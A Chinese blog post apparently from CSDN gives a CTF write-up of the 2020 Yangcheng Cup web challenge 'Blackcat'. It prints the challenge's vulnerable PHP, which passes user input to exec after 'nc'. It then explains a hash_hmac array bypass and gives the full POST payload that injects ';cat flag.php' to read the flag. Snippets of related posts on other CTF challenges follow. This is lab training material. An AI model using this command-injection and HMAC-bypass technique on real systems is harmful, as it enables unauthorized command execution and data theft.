[羊城杯 2020]Blackcat

最新推荐文章于 2023-09-04 22:15:11 发布
最新推荐文章于 2023-09-04 22:15:11 发布
阅读量1k 收藏 1
点赞数 1
分类专栏: CTF WEB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/K1ose/article/details/115434093
版权

访问页面,view-source一下;
题目暗示要听歌
在这里插入图片描述
点开mp3文件,在结尾发现了php源代码;

if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){
    die('谁!竟敢踩我一只耳的尾巴!');
}

$clandestine = getenv("clandestine");

if(isset($_POST['White-cat-monitor']))
    $clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);


$hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);

if($hh !== $_POST['Black-Cat-Sheriff']){
    die('有意瞄准,无意击发,你的梦想就是你要瞄准的目标。相信自己,你就是那颗射中靶心的子弹。');
}

echo exec("nc".$_POST['One-ear']);

首先需要POST参数Black-Cat-SheriffOne-ear
getenv()从环境中取字符串,获取环境变量的内容;
然后POST参数White-cat-monitor,并且HMAC算法生成哈希值,调用两次;
最后判断生成的哈希值与Black-Cat-Sheriff是否相等;
One-ear需要去获取flag的内容;

hash_hmac($algo, $data, $key)
这道题的难点应该在于如何在不知道获取的环境变量的情况下去得到两轮加密的哈希值;
如果我们让第一次加密得到的值是我们可知的,那么第二次加密得到的值也是我们可控的;
当传入的$data为数组时,加密得到的结果固定为NULL

var_dump(hash_hmac('sha256', array(0), 'Unknown_key'));

在这里插入图片描述

得到的结果为null

在这里插入图片描述
上图参考PHP Manual文档
如果加密的密钥$keynull的话,生成的哈希值也是我们所知的;
因此令$White-cat-monitor[]=K1ose
那么根据代码的逻辑,我们先得知道flag放在哪个文件里;
扫一扫目录;
在这里插入图片描述
有个flag.php
$One-ear=;cat flag.php;
这里的;是为了结束nc的指令,另起一个指令操作;
加密一下,获取hash值;
在这里插入图片描述
$Black-Cat-Sheriff=04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6

POST这三个参数;

White-cat-monitor[]=K1ose&Black-Cat-Sheriff=04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6&One-ear=;cat flag.php

得到flag

在这里插入图片描述

K1ose
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[羊城 2020]black cat - 文件隐写+RCE(hash_hmac绕过)
oZuoShen123的博客
10-10 471
这题要post这几个参数:Black-Cat-Sheriff、One-ear、White-cat-monitor 这里有3个if,首先第一个肯定绕过; 第二个if里面存在hash_hmac函数,只要我们传数组就能让盐是空,即第一次加密的clandestine是空 第三个因为盐是空所以只有普通加密,Black-Cat-Sheriff传对应加密结果就行 特性:MD5、sha特性是无法识别数组,只要是数组加密,就会变成null,所以White-cat-monitor采用数组绕过
2020YCBCTF:2020羊城官方writeup及
03-24
20202020羊城官方writeup及源码 各个过渡的分散的writeup后续会逐步上传,所有转移的writeup已经汇总在wp文件夹下的writeup文件里面了!
BUUCTF--[羊城 2020]Blackcat
qq_46263951的博客
08-19 1037
进入后查看源码发现提示都说听听歌了! 下载Hei_Mao_Jing_Chang.mp3文件,使用命令strings Hei_Mao_Jing_Chang.mp3查看文件 在文末看到一段PHP代码 if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){ die(' $clandestine = getenv("clandestine"); if(isset($_POST['White-cat-monitor'..
Blackcat-WordPress资源付费主题
11-06
Blackcat是一款专为WordPress设计的资源付费主题,旨在帮助网站所有者通过提供付费内容来实现盈利。这款主题具有丰富的功能和高度的定制性,能够满足各种类型资源网站的需求,包括但不限于教程、电子书、视频课程、...
BlackCAT
03-20
BlackCAT 是一个基于 JavaScript 的工具或项目,从标题来看,可能是开发者个人用于特定目的的工具,由于描述中提到“纯自用,无维护”,意味着它可能并非为公共使用而设计,也不提供持续的更新或技术支持。...
WordPress付费会员制虚拟资源下载网站主题Blackcat.rar
01-07
WordPress付费会员制虚拟资源下载网站主题Blackcat 该主题是基于简约实用的主题选项框架 Codestar Framework进行开发的功能强大的付费会员制主题,该主题尤其适合用于搭建付费下载资源网站,比如素材站、软件站、...
blackcat_website
03-27
"blackcat_website"项目似乎是一个基于JavaScript的网站开发项目,主要文件名为"blackcat_website-main"。这个项目可能是一个个人或团队为了展示其技术能力、创建一个特定功能的网站或者是一个教学示例而构建的。...
每日练习-[羊城 2020]Blackcat
最新发布
m0_68113265的博客
09-04 151
下载mp3文件,010打开末尾有代码提示。
[NSSCTF][羊城2020]WEB复现
cosmoslin的博客
03-13 5218
easycon 考点:一句话,base64转图片 访问index.php,提示eval post cmd,应该是有一句话,直接蚁剑连接 里面有一个bbbbbbbbb.txt,打开发现是一串base64编码 发现是jpg头,base64转图片即可 easyphp 考点:.htaccess <?php $files = scandir('./'); foreach($files as $file) { if(is_file($file)){
BUUCTF刷题记录(持续更新中~)
热门推荐
xiaolong22333的博客
04-03 5万+
之前陆陆续续做过一些题,但都没有记录,这次打算巩固一下,记录下来。 .
buu-day05
anwen12的博客
01-03 691
0x01 [NPUCTF2020]验证???? str.replace(/(?:Math(?:\.\w+)?)|[()+\-*/&|^%<>=,?:]|(?:\d+\.?\d*(?:e\d+)?)| /g, '') 第一步是一个弱类型比较,下面有两个常用的比较方式 a[]=a&b[]=a a='1' &b=[1] 注意第二种方式必须使用json格式进行传输,不然[1]会被解析成为字符串。很显然这里使用第二种。 第二步就是研究上面这个正则表达式了。一共分为3个
crypto-CSTPC(羊城 2020)
耐酸碱高温固化材料近距离传输研究
12-06 384
一道比较新颖的RSA题目,记录一下。题目源码code是一份使用libcst将python代码转换成语法树的结果:https://gitee.com/shanzhuer/YCB2020CTF/blob/main/wp/crypto/CSTPC/code研究了好几天如何从tree格式还原python源码,今天终于灵光一现可以像这样: https://gitee.com/shanzhuer/YCB2020CTF/blob/main/wp/crypto/CSTPC/re.py反编译出来大概是这样一个程序: 大概分析
buuctf[羊城 2020]Simple
qq_38060946的博客
03-09 393
维纳攻击、拓展维纳攻击
2020羊城、第六届工控比赛部分题目复现
m0re's blog
09-17 2391
本文目录羊城easyconBlackCat工控签到ICS_1ICS_4ICS_10ICS_12 羊城 easycon 环境打开 dirsearch扫描得到两个可以访问的文件 一个是index.html、另一个是index.php访问index.php会有个弹窗,看到 题目中提示菜刀。所以猜测这个是连接密码。 使用蚁剑连接,成功连接。 但是,那个bbbbbbb.txt没有flag,是base64转图片,使用在线网站可以直接转换得到图片,这个是需要加上一个头的,缺少图片头的格式。 BlackCa
Java练习题,创建一个猫类,然后分别创建三只猫的对象,分别是黑猫,白猫,黄猫,让三只猫都去捉老鼠
06-02
好的,我来为你解答这个Java练习题。 首先,我们需要创建一个猫类,并添加猫的颜色属性。代码如下: ```java public class Cat { private String color; public Cat(String color) { this.color = color; } public void catchMouse() { System.out.println(color + "猫抓老鼠"); } } ``` 然后,我们可以创建三只不同颜色的猫的对象,代码如下: ```java public class Main { public static void main(String[] args) { Cat blackCat = new Cat("黑"); Cat whiteCat = new Cat("白"); Cat yellowCat = new Cat("黄"); blackCat.catchMouse(); whiteCat.catchMouse(); yellowCat.catchMouse(); } } ``` 运行上面的代码,就可以看到三只不同颜色的猫都在抓老鼠了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值